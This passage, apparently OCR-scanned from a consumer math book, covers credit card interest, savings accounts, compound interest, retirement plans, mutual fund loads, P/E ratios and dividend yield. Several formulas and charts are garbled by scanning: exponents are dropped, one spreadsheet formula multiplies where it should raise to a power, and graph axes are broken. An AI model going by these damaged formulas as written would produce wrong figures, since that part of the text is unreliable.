to pay vehicle registration fees (since your car has to have 
license plates) and sales tax. Some places want to tax the full 
purchase price of the new car and ignore the cash value of 
trade-in. 


Be wary of dealers who tax the full purchase price of the 
car and ignore the value of rebates (a practice many states 
permit), documentation (“doc”) fees, and add in any fees 
labeled “dealer prep” or “shipping and handling.” These last 
two fees are bogus fees. 
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Studying up on education loans 


Some loans — specifically those that let you purchase things that 
end up worth more than the loan costs — are good investments. In 
that way, a student loan can be a great investment. These loans are 
great financial tools, designed to help students pay for college costs, 
such as tuition, books, and living expenses. In addition, student 
loans are relatively easy to get, the loan rates are usually much 
lower than other types of loans, and payback usually doesn’t begin 
until the student’s education has ended — and some students can 
even get their loans forgiven if they go into certain fields or agree 
to work in certain areas of need for a few years after graduation. 


But you need to be careful with these loans to ensure that you 
don’t end up owing more than you can afford to pay back. The loan 
of choice is a federal direct subsidized loan for undergraduate 
students. It’s a fixed-rate loan with a current rate of 3.4 percent. 
You might also get a loan from a bank. One major bank currently 
offers fixed-rate loans for “as low as” 6.17 percent. 


The mechanics of a student loan are about the same as for other 
types of loans. You borrow the money, and then you have to pay 
it back. To get a snapshot of payoff period and interest paid, visit 
http://cgi.money.cnn.com/tools/studentloan/student 
loan.html. You'll see, for example, that a $60,000 loan at 

6.17 percent with $600 monthly payments will take 11 years and 

9 months to pay off. You’ll pay $24,457 in interest, too. 


Calculating How to Avoid or Get 
Out of a Credit Card Hole 


Decades ago, credit purchases were a novel way of making consumer 
loans. A family might have an account at the grocer’s or general 
store. In the heyday of the great department stores, the store 
might issue a charge-a-plate, a small metal card that allowed 
on-account purchases at that store. Today, bank cards (notably 
Visa and MasterCard) are accepted practically everywhere. 


Credit cards can be a great blessing or a great curse, depending on 
how you use them. In the following sections, I tell you how to avoid 
the trouble many credit card users get themselves into. 
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Understanding how 
credit cards work 


A credit card is revolving credit. You have a credit limit, and you 
can borrow up to the limit. As you pay down your balance, you can 
borrow more. This sounds like a good deal — and it can be, as long 
as you pay off your balance each month. Otherwise, you must pay 
interest and may never pay off your balance. To see what happens 
when you don’t pay off your balance, jump to the upcoming section 
“Paying down credit cards.” 


In addition, because the loan is unsecured, it usually has a relatively 
high interest rate, ranging from, say, 10 percent to as high as 

33 percent. These high rates allow banks to make a lot of money, 
while offering you convenience in exchange. 


When you use your card, the merchant pays a swipe fee for 
accepting it. You pay for this through higher prices. 


Avoiding annual and other fees 


Way back in the Stone Age, credit card lenders charged you an 
annual fee, typically $20.00, for the privilege of using their cards. 
Then annual fees went away for a long time. However, because of 
government activity (investigating and lowering swipe fees, for 
example), banks feel that they are hurting for money and may 
re-institute annual fees. 


Other fees include inactivity fees (you have a card that you never 
use), application fees, cash advance fees, balance transfer fees, 
late fees, over-limit fees, return check fees, and foreign transaction 
fees. 


A merchant may try to charge you a checkout fee (a surcharge) 
for using a credit card. Checkout fees are prohibited by law in 
ten states. 


Your goal is to avoid, if possible, using any credit card that charges 
an annual fee. You can avoid most of the other fees, too. 
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Rewards, points, and folderol 


Credit card lenders generally aren't too competitive over interest rates. Vast 
number of cards charge between 18 percent and 21 percent. To appear competitive, 
many banks offer what they call “rewards,” “points,” “loyalty points,” or “travel 
points” as an incentive for you to use their cards. You can redeem those points for 
merchandise, travel, or in some cases cash. Here’s a typical point setup: The Chase 
Amazon Visa, which | use, gives you 1 point (worth $0.01) to spend on Amazon when 
you charge $1.00 anywhere. The points accumulate all the time, and you can spend 
any number of them at any time. 


There are two schools of thought about points. Some people swear by them, 
insisting that they give you something for nothing. Other people avoid them, 
believing that points muddy the water. 


If you're inthe “swear-by-them” crowd, make sure you use the points you accrue 
for things you actually need or will use. 


Paying down credit cards 


To enjoy the convenience of credit cards while avoiding the troubles, 
you have to use your credit cards wisely. Monthly interest accrues 
at 1/12 the annual percentage rate (APR). If, for example, the APR 
is 18 percent, then the monthly rate is 1.5 percent. 


To figure your monthly balance, the bank takes your old balance, 
adds new charges, adds interest, subtracts payments, and shows 
you your new balance: 


new balance = old balance + new charges + interest - payments 


It’s interesting to see how your balance grows when you make 
partial payments rather than paying the card off each month. 
Figure 10-8 shows seven months of credit card numbers with an 18 
percent APR. 


The lesson here is that if you charge $100.00 but make payments of 
just $50.00, eventually your ending balance will grow, not decline. If 
you have a big limit on your balance (for example, $16,000.00), the 
interest charges can get very dramatic as your balance approaches 
your limit (for example, $240.00 per month at the maximum bal- 
ance for an 18 percent APR card). 
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Starting New Monthly| Ending 
Balance| Charges) Interest} Payment| Balance 


$0.00} $100.00; $1.50} -$50.00} $51.50 
$51.50} $100.00} $2.27) -$50.00} $103.77 
$103.77} $100.00} $3.06] -$50.00| $156.83 
$156.83} $100.00} $3.85] -$50.00| $210.68 
$210.68} $100.00} $4.66] -$50.00| $265.34 
$265.34} $100.00} $5.48] -$50.00| $320.82 
$320.82] $100.00) $6.31] -$50.00} $377.13 
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Figure 10-8: Looking at the increasing credit card balance. 


Rule of thumb: Try never to charge anything that’s consumed 
before it’s paid for. That includes fancy dinners and movie tickets. 
After the thrill is gone, the payments linger on. The best thing you 
can do with a credit card — and admittedly it isn’t easy — is to pay 
it off promptly. 


Selecting Savings Accounts 


seh S TUp, 


Savings is a great tradition. The people in some countries save 

a relatively high percentage of their incomes. The United States 
hasn’t usually been known as a nation of savers, but things are 
changing. Here are some of the savings options and the amount of 
interest each typically earns: 


Regular savings account: This is a “no strings” savings 
account. You “own” the money and can withdraw it all at any 
time. The disadvantage of a regular savings account is that 
interest rates are very, very low, as little as 0.01 percent. 


A regular savings account is sometimes called a passbook 
savings account because of the little book (the passbook) 
people used to carry to the bank. The teller wrote in the 
amounts of deposits and withdrawals in the book. 


1# Certificates of deposit: A certificate of deposit (CD) has a fixed 
term, such as 1 year, 2 years, 5 years, or 10 years. It pays 
better interest than passbook savings, and even better rates 
are available if you buy a jumbo CD, typically for an amount 
greater than $100,000.00.The drawback is that you’re not 
expected to make any withdrawals. If you do, “severe penalties 
may apply.” Your “math job” with certificates of deposit is 
simply to compare interest rates. The bank will do the rest for 
you. To compare rates, visit http: //www.bankrate.com/. 
Typical rates are about 0.25 percent to 0.50 percent. A jumbo 
CD might yield 1.25 percent. 
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College savings accounts: An education savings plan (a 529 
plan) is designed to help families set aside money for college 
costs. It has tax advantages, because, although your deposits 
aren’t tax-deferred, the money that grows in the account is 
free from federal (and sometimes state) taxation. 


Medical savings accounts: A health savings account (HSA) 
works “in partnership” with a high-deductible health insur- 
ance plan at your job. With a health savings account, you 
put aside money for medical expenses. The tax advantages 
include 1) not being taxed on money you put in, and 2) not 
being taxed on money you spend on qualified expenses. There 
are various limits and other strings attached. 


Chapter 11 


Key Principles of 
Investment Math 


In This Chapter 


Determining your tolerance for risk 
Looking at retirement plans and pensions 
Investigating math related to stocks, bonds, and mutual funds 


ou are an investor. Maybe you're not as big as a giant pension 

fund or a Wall Street bank, but just the same, you’re an 
investor. When you invest, you put money into something with the 
expectation of gain. The idea is that investments “grow money” 
until you need it. Food and clothing, while important, aren’t 
investments. Savings accounts (covered in Chapter 10), stocks, 
bonds, and mutual funds are. 


In this chapter, I make investment math as easy as possible for 
you. I explain the basic investment math, the vocabulary, and the 
tools (which include basic math skills, online calculators, and your 
fine mind) that can help you handle your everyday investment 
concerns. 


Factoring Personal Info into 
Investment Decisions 


No matter how much or how little money you have to invest, you 
need to know a little about yourself before you make any investment 
decisions, including how much to invest and what to invest in. 
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Knowing your tolerance for risk 


Risk tolerance is your assessment of how much risk you’re willing to 
take with investments. You’ve heard the adage, “There’s no such 
thing as a free lunch.” That’s true of investments. An investment 
with a possibility of a higher payoff is likely to be riskier than one 
with a lower (but more reliable) return. 


For example, if you put $100 in the bank at 1 percent interest and 
leave it there for a year, you know for certain that you will have 
$101 one year later. That’s low-risk: You don’t assume much risk, 
and your investment doesn’t generate a big return. On the other 
hand, if you bet $100 on the flip of a coin, you have a 50 percent prob- 
ability that you'll double your money ($200) and a 50 percent 
probability that you’ll lose it all ($0.00). That’s high-risk. Both 

the risk and the potential return are high. 


Risk tolerance is mainly psychological. You need to determine 
whether you’re risk-averse, risk-neutral, or risk-loving. If you 

deal with a broker, he or she will ask about your tolerance. Even 
without a broker, you can take risk tolerance surveys online. Visit 
http: //www.paragonwealth.com/risk_tolerance.php. 


Conventional wisdom (and it’s pretty good) links risk tolerance to 
your age. If you’re younger, the thinking goes, you can afford more 
risk because you have time to make up for losses and you may see 
some good gains. If you’re older, however, you typically need to 
be wary of risk to reduce the chance that your “sunset years” will 
become your nightmare years. 


Looking at your investment horizon 


Your investment horizon is the time in which you expect to buy and 
hold investments. This horizon is usually based on age. For example, 
if you’re 60 years old and want to retire at 65, your investment 
horizon is about 5 years. If you’re 25 years old, you’ve got a long 
time to save and invest. Your investment horizon is about 40 years. 


Usually, those with longer investment horizons can concentrate 
on higher-risk investments, such as common stocks (or common 
stock mutual funds). Those with shorter investment horizons may 
be better off with fixed-income securities, such as bonds (or bond 
funds). 
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Choosing between appreciation 
or income 


Based on your risk tolerance and your investment horizon, you are 
likely to pursue one of two broad categories of investments: those 
that grow in value (appreciate) and those that produce income. 


Investments that appreciate: Appreciation is an increase in 
the value of assets, including cash in savings and your home 
(you hope). When stocks appreciate, their price goes up, 
making them more valuable. 


Investments that generate income: /ncome from an investment, 
generally speaking, comes in the form of regular payments 
of interest or dividends. Income from investments is taxed 
as ordinary income, but that doesn’t mean you spend it like 
ordinary income. Generally, you pay the taxes and plow the 
remainder into more investments. 


A mix of investments: At different points in your life, you may 
be advised to consider a mix of investments. When you’re 
younger, you may have more aggressive growth investments 
and fewer income investments. As you grow older, you may 
shift to more conservative growth investments, bonds, and 
perhaps tax-free bonds. 


Playing with Instruments: 
Not the Musical Kind 


A financial instrument (sometimes called a vehicle) is an asset you 
can trade, and you'll be exposed to many of them over your lifetime. 
You can also call these assets investment products. 


Basic financial instruments 


Here’s a brief tour of basic instruments: 


 Savings-based instruments: These include savings accounts, 
certificates of deposit (CDs), treasury bills, treasury notes, 
and treasury bonds. They’re considered savings-based 
instruments because you put money in and just let it grow. 
No buying or selling is involved. A savings account “goes on 
forever,” and when a CD matures, you typically just renew it. 
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 Investment-based instruments: These include common 
stocks, preferred stocks, options, commodities, corporate 
bonds, and municipal bonds. These instruments require more 
involvement than savings-based instruments. The idea is to 
buy and sell them in a way that minimizes your losses and 
maximizes your gains. (By the way, a mutual fund is a collection 
of individual investment items. See the section “Managing 
Mutual Funds” for details on that investment vehicle.) 


 Real-estate-based instruments: These include your home, 
a vacation home, a rental property, real estate investment 
trusts, or a whole apartment building (if you happen to own 
one). Even “raw” land is a real estate investment. 


Other instruments: This category includes just about 
anything — including gold, silver, and platinum — that 
doesn’t fall into the other categories. Collectibles, such as art, 
stamps, coins, books, and a collection of Model T Fords, are 
instruments, too, in that they can increase in value and be 
traded for money, but the process of selling them can be slow. 
They’re not very “liquid,” as the saying goes. 


 Insurance-based instruments: Some forms of insurance have 
an investment component. Many types of insurance offer only 
protection (think term life insurance or automobile insurance), 
but some insurances, such as whole life insurance and 
annuities, also have an investment component. I explain these 
in more detail in Chapter 12. 


Climbing the investment pyramid 


When you invest, pay a good deal of attention to conventional 
wisdom, which generally tends to be sound. Here’s one example 
of conventional wisdom at work: Begin with the most reliable 
investments possible and, over time, add more speculative, risky 
investments. 


Such a plan takes the shape of a pyramid. Figure 11-1 shows a 
typical investment pyramid. 


If you follow a pyramid like the one in Figure 11-1, you can hold 
cash in some very reliable vehicles, such as a savings account 
and certificates of deposit. Even some insurance has conserva- 
tive investment components that can return cash to you. After 
cash, your investments become riskier, but the payoffs are better. 
Mutual funds are pretty reliable, and so are bonds. 
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Figure 11-1: An investment pyramid. 


A pyramid scheme is something entirely different from the investment 
pyramid. It’s a fraudulent investment that you want to stay away 
from. 


Doing a little at a time over time 


How do you eat an elephant? One bite at a time. It’s the same with 
investments. You don’t need to save or invest a lot. Just put away 
something. Try $10 per week. A little money will grow a lot if you 
give it enough time. So the younger you are when you start, the 
better off you'll be when you’re older. You can retire with a big pile 
of money if you work this right. 


For example, if you put just $10 per week into a savings account 
paying 1.0 percent per year, at the end of the year (52 weeks later) 
you have $520 from your deposits and $3.04 in interest! (This 
example assumes monthly compounding, although banks may 
compound more frequently, but it shows how interest impacts 
your balance in a good way.) 


It’s crazy to think that you don’t have to save a thing until you’re 
about 60, and then you can build up your assets for retirement at 
age 65. Start early, even if you can only afford a little bit at a time. 


Figuring in inflation 
Conventional wisdom says that your investments have got to “beat 


inflation.” That is, they have to earn at least as much as the rate of 
inflation. Inflation is the gradual increase in prices over time. 
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The current rate of inflation in the United States is 1.7 percent, 
which means that $1.00 this year basically buys 1.7 percent less 
than it did last year. Therefore, try to put your money in instruments 
that earn at least 2 percent. 


Avoiding foolish decisions 


As the saying goes, “A fool and his money are soon parted.” Keep 
the following points in mind: 


Gambling (in casinos, at the racetrack, or playing Lotto) is not 
the road to financial success. Almost every form of gambling 
has a “house edge,” which means you will lose money. Lotto is 
one of the biggest losers (see Chapter 9 for more). 


“Get rich quick” schemes won’t make you rich. At best, they’ll 
make someone else rich, with your money. 


If something is “too good to be true,” it’s probably not true. 
Beware of pitches that claim overnight doubling of your 
money, such as email solicitations from companies pushing 
penny stocks (those with a selling price of $0.01 or $0.02 per 
share). 


Growing the Green Stuff: 
The Time Value of Money 


Principal is the money you invest. Interest is the money that the 
principal earns. A savings account deposit, for example, is probably 
the simplest investment there is, and the bank pays you interest 
on your savings because it lends your money to others at a higher 
interest rate. 


The time value of money is the value money, earning a certain 
amount of interest, grows to over a particular period of time. Over 
time, money that earns interest grows substantially. To see the 
way the time value of money works, take a look at simple interest 
compared to compound interest. 
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Calculating simple interest 


Simple interest is calculated only on the principal invested. Say that 
your Aunt Tillie gave you $100 on your tenth birthday. Because 
your mother wouldn’t let you spend it on frivolous things and 

told you to save it for a rainy day, you put it in a bank that pays 

5 percent interest annually. 


Here’s how you calculate interest on $100 principal (p) at an inter- 
est rate (Ù of 5 percent per year. 


interest = principal x rate 
i=p(r) 
i = $100.00(0.05) 
i = $5.00 


So, after 1 year, your $100 has earned $5. Every year, simple inter- 
est is the same. At the end of 50 years, your $100 will have earned 
$250 ($5 x 50) in interest. 


By contrast, it’s the world of compound interest where things 
get hot. 


Calculating compound interest 


Compound interest is calculated on the principal and interest 
accrued. Basically, you add the amount you made in interest to 
the principal. Then you let another period (usually 1 year) go by. 
You earn interest on the total. Then you do it again and again and 
again. With compound interest, from the end of year 1 to the day 
you withdraw, the total value of the investment climbs. 


Given the same scenario as that used in the preceding section — your 
generous Aunt Tilly gives you $100 that your mother insists you 
save — you decide to put it in a bank that pays 5 percent interest 
compounded annually. Now say that 50 years have passed. How 
much money do you have in that old account now? 
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Figure 11-2 shows an example of the time value of money. Notice 
that at the end of year 15, your $100 has more than doubled to 
$207.89. At the end of year 50, your $100 is now $1,146.74 — a 1,000 
percent increase! That’s the power of interest. 


Bank balance 
$1,400.00+ -- -- -- ---------- ++ 2-2-2520 AE nnn 


$1,200.004------------------------------------------------------------=-- 

$1,000.004----------------------------------------------------- eee 7 
$800.004------------------------------------------------------ 
$600.004---------------------------------------------7 
$400.004------------------------------- -257 


p mernani ull 
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Figure 11-2: The time value of $100 held for 50 years. 


35 37 39 41 43 45 47 49 51 


Albert Einstein said, “Compound interest is the eighth wonder of 
the world. He who understands it, earns it... he who doesn’t. . . 
pays it.” 


Calculating future value 


Future value is what your investment will be worth some time in 
the future; present value is what it’s worth now. Using the Aunt 
Tillie example, in which the starting amount is $100, the inter- 
est rate is 5 percent, and the number of periods is 50 years, you 
can calculate future value with this formula. Here FV is the final 
amount, PV is the starting amount, i is the interest rate, and n is 
the number of periods: 


ane of periods 


future value = present value(1.00+ rate 
FV =PV(1+i)" 
FV =$100.00(1+0.05)” 


FV =$100.00(1.05)” 
FV =$100.00(11.4674) 
FV = $1,146.74 


The $100 will grow to $1,146.74. 
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Oh, see how it grows! The joys 
of making regular deposits 


In the preceding section, I explained how compounding works and 
why it makes your money grow much faster. Now imagine that 
instead of a one-time deposit (the $100 in the earlier examples) 
you make regular deposits over a long period of time, as you would 
with monthly deposits you make to a college savings plan or 
regular deposits you make to any savings plan where you want 

to have a fixed amount by a certain date in the future (like a 
Christmas Club account). 


To help you see how making regular deposits really boosts your 
bottom line, assume you have $100 per month to invest, and you’re 
trying to decide whether to squirrel it away under your mattress or 
invest it. Let the info in the following sections help you decide. 


Investment plan #1 — Money under the mattress 

In this scenario, every month, you tuck another $100 under 
your mattress. To determine how much you'll have at the end of 
50 years, use the following equation, in which FV is future value 
and p is the monthly payment: 


future value = monthly payment x12 payments per year x 50 years 
FV =px12x50 
FV = px600 
FV = $100.00 x 600 
FV = $60,000.00 


If you hide $100 per month under the mattress for 50 years, that’s 
600 payments. The (now lumpy) mattress has $60,000 under it. 
Not bad! 


Investment plan #2 — Money invested at 5 percent 


In this plan, you put your $100 per month into an investment that 
pays 5 percent per year. To see how much you'll end up with in 
this scenario, use this formula, in which FV is the future value, p is 
the monthly payment, n is the number of payments (600 over 

50 years), and i is the monthly interest rate (the annual rate of 

5 percent divided by 12), which happens to be 0.004167. 
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pv =p| Or) 


l 


a ( 
FV = 1000] 0.004167 


_ 12.1194-1 
rage $100.00] 154427 | 


FV = $268,013.96 


1+0.004167)® -1 | 


Plan #2 produces $268,013.96, which makes it a much better deal 
than Plan #1. Note: The Excel spreadsheet formula for this calcula- 
tion is =100*((1+0.05/12)*600-1)/(0.05/12). 


These are pretty hairy formulas, right? To do more math with less 
effort, consider going to an online calculator, such as http: // 
www.uic.edu/classes/actg/actg500/pfvatutor.htm. 

The key is to always use the best tool. When the math gets tough, 
check the Internet for a calculator. 


Rounding Up Retirement Plans 


A pension is a fixed sum of money you get, usually monthly, most 
often (but not always) on retirement from a job. An exception is 
that you may get a spouse’s benefit, a widow’s benefit, or children’s 
benefit from the U. S. Social Security system. Here’s the lightning 
round, summarizing retirement plans: 


Employer plans: These plans, known as defined benefit or 
defined contribution plans, are set up by employers for their 
employees, who have to meet certain eligibility requirements 
(like years of service and age) in order to receive the pension 
disbursements. A defined benefit plan tells you explicitly how 
much money you can look forward to in retirement. By contrast, 
a defined contribution plan has results based on how much 
money you put in. Small business employer plans are the SEP 
IRA and SIMPLE IRA. 


Personal plans: These are plans you create and maintain by 
yourself. Typically, the plans are the Individual Retirement 
Account (IRA) and Roth IRA. The benefit is based on how 
much and how frequently you put money into the plan. There 
may be certain tax advantages. To find out more, see the 
section “Calculating current and future tax advantages.” 


Chapter 11: Key Principles of Investment Math ] 93 


Government plans, such as Social Security: Social Security is 
a defined benefit plan, financed through payroll contributions 
that you and your employer make. You pay a Social Security 
tax throughout your employment years, and when you reach 
a specified age, you receive payments from the Social Security 
Administration. 


Some plans offer tax advantages. For example, in many plans, you 
don’t pay taxes on a portion of your contribution when it goes in. 
Also, some plans have an “employer match,” where the company 
puts in some money to match your contributions. 


The feisty 401 (k)/403 (6): 
Defined contribution plans 


Whether you work in the private sector or the public sector, your 
employer probably offers a defined contribution plan. A defined 
contribution plan is a retirement plan in which you decide how 
much money to put into it. What the account earns over time 
depends on how well the investment vehicle (one you choose from 
options offered by the company) does. Defined contribution plans 
have two key features: 


ı” Tax deferred: Contributions are deducted from your paycheck 
before taxes are calculated. You'll pay taxes later on these 
contributions (probably at a lower rate) when you retire at 
about age 65. 


Employer match: A generous employer may offer to match 
part of your contributions. For example, some employers 
match 50 percent of the first 6 percent of your contribution. 
What this means is that, if you put in 6 percent of your gross 
pay, your employer will match 50 percent of that. 

To figure the maximum employer match (based on 6 percent, 
for example), start by multiplying your annual salary by 0.06. 
Say you make $40,000.00 a year: 

$40,000.00 x 0.06 = $2,400.00 
Then calculate 50 percent (0.50) of that amount. 


$2,400.00 x 0.50 = $1,200.00 
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You can still contribute more (often up to 10 percent of your 
annual salary). However, the employer stops matching at 50 
percent of 6 percent. 


Financial advisors point out that the employer match is “free 
money,” and that you should take it. 


A 401(k) plan is the type of retirement plan you find at corporations 
and medium-sized businesses. A 403(b) plan is the type of 
retirement plan you find at public education organizations and 
some non-profit employers. 


If you “draw down” money early (which is allowed), you’re looking 
at severe penalties, and you'll be paying income taxes at your 
current rate. 


Adding up IRAs and their kin 


Some retirement plans are very similar to 401(k)/403(b) plans. 
Almost all of them offer a tax advantage. IRAs and Roth IRAs are 
personal retirement accounts. SEP IRAs and SIMPLE IRAs are 
popular in the world of small business. Here’s a summary: 


Individual Retirement Account (IRA): An IRA is your own per- 
sonal retirement account. You currently can “tax defer” up to 
$5,000 per year (and $6,000 if you’re 50 or older), meaning you 
pay no tax on that money now. When you make withdrawals 
at around age 65, you pay taxes on principal and interest at a 
lower marginal tax rate. See the section “Calculating current 
and future tax advantages.” You can start making withdrawals 
between ages 59% and 70%. 


Note: If you’re covered by a retirement plan at work, your 
personal IRA tax-deferred deduction may be limited or 
reduced to $0.00. 


Roth IRA: A Roth JRA is a variation of the IRA. You pay taxes 
on your money before you put it into the plan, but you pay no 
taxes on principal or interest when you draw the money out. 


Simplified Employee Pension Individual Retirement 
Arrangement (SEP IRA): In a SEP IRA, you and your employer 
make contributions into a traditional IRA established in your 
name. There are tax advantages. 


Savings Incentive Match Plan for Employees Individual 
Retirement Account (SIMPLE IRA): Like the SEP IRA, the 
employee and employer make contributions to the employee’s 
account, and there are tax advantages. 
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The dinosaur in the room: 
Traditional defined benefit plans 


The defined benefit retirement plan is a vanishing entity. In a defined benefit plan, 
the company promises to pay you a specific amount every month after you retire. 
It’s usually determined by your wages, length of service, and age. 


These types of plans used to be the only retirement plans around. Unfortunately, 
many employers consider them to too costly and have replaced them with defined 
contribution plans. A few companies still have such plans, though. Municipal 
governments have them. Social Security and military retirement are defined benefit 
plans. 


The biggest difference between a SEP IRA and a SIMPLE IRA is 
contribution limits. If you’re an employee, your employer will have 
chosen one or the other. If you are a business owner, you’ll need 
to get professional advice from a tax expert. You can also use 
Publication 560 from the Internal Revenue Service: http: //www. 
irs.gov/pub/irs-pdf/p560.pdé. 


Making sensing of Social Security 


The United States Social Security program is the largest government 
program in the world. It’s a retirement plan, with additional 
benefits for spouses, widows and widowers, children, and the 
disabled. 


A key component of Social Security is that the plan is a defined 
benefit plan. Basically, you put your money into Social Security 
during your working years (via payroll deductions), and when you 
retire, Social Security sends you monthly checks. 


What will your benefit be at retirement? Strictly speaking, the 
United States Social Security Administration (SSA) can’t tell you 
that until you apply for benefits. However, the SSA provides a 
calculator to help you estimate your benefit in today’s dollars or 
future inflated dollars. Visit http: //www.ssa.gov/retire2/ 
AnypiaApplet.html. 


If you use the online calculator, be prepared to enter many years’ 
worth of earnings. 
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Calculating current and future 
tax advantages 


When it comes to taxes and retirement accounts, the U.S. government 
says, “You can pay me now, or you can pay me later.” If possible, 
try to pay later. When you retire, you are likely to be subject toa 
lower marginal tax rate (also known as a tax bracket). 


Those brackets are currently 10, 15, 25, 28, 33, and 35 percent. 
During their working years, many people earn enough to be taxed 
at the 25 percent rate. When you retire and start drawing down a 
retirement plan, you will likely be in the 10 percent or maybe the 
15 percent bracket. 


So what should you do? Defer your taxes now and pay them later, 
after you retire, or pay them now and get your retirement money 
free and clear? Well, free and clear always sounds good, but is it 
the smartest choice financially? 


Say you have $50,000 in income and have to decide whether you 
want to defer taxes on $5,000 (a 10 percent IRA contribution) or 
pay them now. 


If you pay taxes on the $5,000 now when you’re in a higher tax 
bracket — say 25 percent — you'll pay $1,250 ($5,000 x 0.25 = 
$1,250). But if you defer those taxes until your retirement, when 
you will likely be in the 10 percent tax bracket, you'll pay only 
$500 ($5,000 x 0.10 = $500). 


Deferring the taxes on $5,000 saves you money. Paying less in taxes 
seems like a better deal than paying more. 


Social Security has an earnings limit. If you continue to make 
money when you're receiving Social Security, your benefit will be 
reduced. However, the Social Security Administration says that 
withdrawals from your IRA don’t count towards the Social Security 
earnings limit. 


Managing Mutual Funds 


A mutual fund is a collective investment. A mutual fund is a 
collection of, say, 30 or more securities. When you buy shares 
in a mutual fund, you own a little bit of all the securities within 
that fund. 
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At 2011’s end, 7,581 mutual funds existed in the United States. With 
over 7,500 funds to choose from, be assured that they come in all 
flavors. Here are several major types of funds: 


Stock (equity) funds: Stock funds are made up of collections 
of common stocks. These are sometimes further broken into 
groups based on market capitalization (micro cap, small cap, 


mid cap, and large cap). That’s a sign of the size of the 
companies. 


Bond funds: Bond funds are grouping of bonds. They include 
municipal bond funds and corporate bond funds. 


Growth funds and income funds: The names of these funds 
alert you to their purpose. Growth funds are collections of 
stocks with a likelihood of appreciating (increasing in price). 
Income funds are collections of stocks that have a good 
history of providing dividend income. For example, you may 
see funds with names like “Aardvark Small Cap Growth Fund” 
or “Aardvark Equity Income Fund.” 


Index funds: Index funds try to imitate the performance and 
yield of well-known indexes, such as the Standard & Poor’s 
500 (S&P 500) index. The theory is that if the fund “matches 
the Dow” or “matches the S&P,” then it’s doing as well as the 
stock market in general is doing. 


Paying attention to fees 


Running a mutual fund costs money, and the investors “pay the 
freight.” A fund’s expenses may be met by including sales charges 
(“sales loads”), 12b-1 fees (annual fees), management fees, 
transaction fees, and anything else the fund managers can think of. 


To complicate things, mutual funds usually have classes of shares: 
Class A, Class B, and Class C. These classes offer you choices in 
front-end loads, back-end loads, and 12b-1 fees: 


Class A shares usually charge a front-end sales load together 
with a small 12b-1 fee. I personally have paid 4.75 percent as a 
front-end load. 


Class B shares don’t have a front-end sales load. They have 
a “contingent deferred sales charge” that declines gradually 
over several years. They are back-loaded. They have a high 
12b-1 fee. Class B shares usually automatically convert to 
Class A shares after you’ve held them for a certain period, 
maybe six or seven years. 
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1# Class C shares have no front-end or back-end load. They are 
level-loaded shares. How can this be? The load is in the high 
12b-1 fee that you pay every year. 


Some mutual funds are no load funds, which means there are no 
front-end or back-end sales loads. There may be various fees, such 
as annual “maintenance” fees. However, if you can find a true 
no-load fund with no 12b-1 fees, more of your money goes into the 
actual investment. 


No-load funds are not automatically better. For example, a fund 
with a 5 percent front load that returns 15 percent annually 
outperforms a no-load fund with a 9 percent annual return. 


To calculate a load, just multiply the amount of your intended 
purchase by the advertised load. If you want to buy $10,000 worth 
of a fund with a 5 percent load, calculate: 


$10,000.00 x 0.05 = $500.00 


Some financial advisors consider Class C shares to be a marketing 
gimmick, trying to make them appear the same as no-load mutual 
funds. 


Figuring the average annual return 


Mutual funds are required to show their average annual return, 
which is an indicator of the fund’s performance. The U.S. Securities 
and Exchange Commission says so. The fund has to show the 
Ending Redeemable Value (ERV) — the end value of a hypothetical 
$1,000 payment (the model payment) at the end of 1-year, 5-year, 
and 10-year periods. 


Funds use the following formula to calculate ERV, where p is the 
model payment, t is the annual average return, and n is number of 
years: 


(ener of years 


ERV = model payment (1.00 + average annual return 
ERV = p(1+t)" 

ERV = $1,000.00(1+ 0.05)” 

ERV = $1,000.00(1.05)” 


ERV = $1,000.00 (1.62889) 
ERV = $1,628.89 
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In this example, the fund has an average annual rate of return of 
5 percent. Over 10 years, the value of an initial model payment of 
$1,000 increases to about $1,630. 


Considering Common Stocks 


A common stock is also called an equity. Typically, a corporation 
issues shares that people can buy on the stock exchange, and the 
stock is said to be publicly traded. Other stocks besides common 
stock exist, such as preferred stock, but common stock is the basic 
form of equity. 


Some people like to buy common stocks one security at a time. For 
example, they buy 100 shares of Intel or Procter & Gamble. Others 
like to buy shares in a stock mutual fund. See the earlier section 
“Managing Mutual Funds.” 


In any case, you usually buy stocks through your broker, who is 
well-credentialed and functions as a trusted advisor. A broker not 
only has credentials, but his company also has a research depart- 
ment, which is supposed to do good analyses; that’s part of the 
reason the brokerage house charges commissions. 


A commission, of course, is a fee you pay to a broker to execute 

a trade. It’s often based on the number of shares or their dollar 
value. You pay a commission when you buy, and you pay another 
commission when you sell. 


You can also buy stocks online. When you do so, you’re on your 
own and must trust your own research and judgment. Trading 
online usually saves you money in commissions. 


Processing PIE ratios 


A stock’s price-to-earnings ratio (commonly called the P/E ratio) is 
the relationship between a stock’s share price and its annual 
earnings per share. By knowing the P/E ratio, you can determine if 
a stock is a good performer. A P/E ratio that’s lower (a stock with a 
relatively low price and relatively high earnings) essentially means 
that you get a lot of earnings for the price. 


For example, a stock that sells for $38.62 per share with earnings of 
$2.86 per share has a P/E ratio of 13.5. That’s pretty good. 
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A P/E ratio between 10 and 17 is considered to be good. A P/E 
ratio greater than 25 suggests that a stock is possibly overpriced. 
A stock that sells at “high multiples” has attracted a lot of buyer 
interest (possibly irrational) and is sometimes called a glamour 
stock. For example, in 2011, a major fast-food chain had a P/E ratio 
of 52! 


The easiest way to calculate a P/E ratio is not to calculate it. Let 
someone else calculate and display it. It’s smart to visit websites 
such as Bloomberg: http: //www.bloomberg.com. 


Figuring your dividends 


A dividend is a payment a corporation makes to stockholders. 
Usually, the company pays dividends four times a year. How much 
you receive in dividends depends on how well the company did 
and how many shares you own. If, for example, you own 100 shares 
and the dividend is $0.21 per share, you’re going to get a check 

for $21. 


If acompany’s stock doesn’t pay dividends, that’s okay. You (and 
the company’s board of directors) may be more interested in the 
stock price going up (appreciating) than in dividends (income). 


Dividend yield is the percentage relationship between your annual 
dividend and the price at which you bought a stock. High yields 
are considered better. For example, if a stock you bought at $10 
per share pays $0.20 per share as a dividend, that’s a lot better 
than getting the same dividend from a stock that cost you $50 per 
share. You get more bang for your investment buck. 


To calculate dividend yield, you use this equation, where i is the 
dividends paid in a year and p is the market price: 


dividends paid in a year 


market price X100 


dividend yield = 


($0.21+ $0.21+ $0.21+ $0.21) 
$34.99 


_ $0.84 
Y = 334.99 * 100 


Y = 0.024 x 100 
Y = 2.40 


Y= x100 


The dividend yield is 2.40 percent. 
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Investing in Bonds 


A bond is a debt instrument. When you buy a bond, whether corporate 
or municipal, you're lending a corporation or a government entity 
a little money, and you'll receive interest until you sell the bond or 
it matures. 


